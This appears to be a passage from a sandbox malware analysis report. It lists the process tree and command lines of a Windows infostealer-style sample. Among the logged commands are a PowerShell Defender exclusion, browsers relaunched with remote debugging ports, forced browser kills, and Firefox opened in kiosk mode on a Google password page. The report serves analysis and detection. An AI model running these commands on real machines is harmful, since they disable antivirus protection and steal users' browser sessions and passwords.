PID 4972 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe
PID 4972 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe
PID 4972 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe
PID 4972 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4972 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4972 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 5044 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 5044 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 5044 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4972 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe
PID 4972 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe
PID 4972 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
PID 4972 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
PID 4972 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
PID 4496 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
PID 4496 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
PID 4496 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
PID 4496 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
PID 4496 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
PID 4496 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
PID 4496 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
PID 4496 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
PID 4496 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
PID 4496 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
PID 4496 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
PID 4496 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
PID 4972 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe
PID 4972 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe
PID 1556 wrote to memory of 4328 N/A C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe
PID 1556 wrote to memory of 4328 N/A C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe
PID 4152 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4152 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4972 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe
PID 4972 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe
PID 4972 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe
PID 4972 wrote to memory of 4552 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe
PID 4972 wrote to memory of 4552 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe
PID 4972 wrote to memory of 4552 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe
PID 2668 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2668 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe

"C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe

"C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10107211121\PcAIvJ0.cmd"

C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe

"C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe"

C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4596 -ip 4596

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 796

C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe

"C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe"

C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4496 -ip 4496

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 800

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe

"C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe

C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\Oar936gK\Anubis.exe""

C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe

"C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe"

C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff99555cc40,0x7ff99555cc4c,0x7ff99555cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1912,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1904 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2140,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2164 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2220,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2236 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3168,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3180 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3204,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3212 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4232,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4452 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4684,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4448 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4644,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4764 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4840,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4848 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4616,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4668 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4632,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4660 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5048,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4720 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5240,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5260 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5248,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5400 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4860,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5344 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9955646f8,0x7ff995564708,0x7ff995564718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,6178398465063867357,3272688161587545164,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,6178398465063867357,3272688161587545164,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,6178398465063867357,3272688161587545164,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2924 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2108,6178398465063867357,3272688161587545164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2108,6178398465063867357,3272688161587545164,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2108,6178398465063867357,3272688161587545164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2108,6178398465063867357,3272688161587545164,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe

"C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe"

C:\Users\Admin\AppData\Local\Temp\dll32.exe

"C:\Users\Admin\AppData\Local\Temp\dll32.exe"

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\10107320101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107320101\nhDLtPT.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\a1vsr" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 11

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe

"C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe"

C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe

"C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe"

C:\Users\Admin\AppData\Local\Temp\BB8Z9QLVS663O4EQKUQWIVS.exe

"C:\Users\Admin\AppData\Local\Temp\BB8Z9QLVS663O4EQKUQWIVS.exe"

C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe

"C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp74A9.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp74A9.tmp.bat

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 4036"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe

"C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe"

C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe

"C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1972 -parentBuildID 20240401114208 -prefsHandle 1892 -prefMapHandle 1884 -prefsLen 27434 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1288b6b4-acc0-4fb8-b3e0-bf258b5d3e09} 868 "\\.\pipe\gecko-crash-server-pipe.868" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2448 -parentBuildID 20240401114208 -prefsHandle 2440 -prefMapHandle 2428 -prefsLen 28354 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {919343b5-487f-4bb9-8234-2ba94088cbb6} 868 "\\.\pipe\gecko-crash-server-pipe.868" socket

C:\Program Files\Mozilla Firefox\firefox.exe

